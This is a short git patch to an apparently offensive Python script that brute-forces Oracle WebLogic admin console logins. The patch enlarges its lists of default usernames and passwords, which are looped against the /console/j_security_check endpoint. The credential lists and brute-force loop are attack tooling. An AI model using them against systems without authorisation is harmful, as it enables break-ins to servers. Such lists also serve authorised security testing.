From 059ba083b28ef9fc02123f3b1d93aa27f0b4e6a5 Mon Sep 17 00:00:00 2001 From: rpkr <13591644403@139.com> Date: Tue, 22 Oct 2019 19:44:27 +0800 Subject: [PATCH] Update weblogic_weakpasswd.py --- weblogic/weblogic_weakpasswd.py | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/weblogic/weblogic_weakpasswd.py b/weblogic/weblogic_weakpasswd.py index f61ef31..74a1c6a 100644 --- a/weblogic/weblogic_weakpasswd.py +++ b/weblogic/weblogic_weakpasswd.py @@ -13,8 +13,8 @@ def attack(URL): #设定用于爆破的账户密码 a = 0 - accounts = ['weblogic'] - passwds = ['Oracle@123','weblogic','password','weblogic1'] + accounts = ['WebLogic', 'weblogic', 'Oracle@123', 'password', 'system', 'Administrator', 'admin', 'security', 'joe','wlcsystem', 'wlpisystem'] + passwds = ['WebLogic', 'weblogic', 'Oracle@123', 'password', 'system', 'Administrator', 'admin', 'security', 'joe','wlcsystem', 'wlpisystem','passwd'] for account in accounts: for passwd in passwds: url = URL + '/console/j_security_check'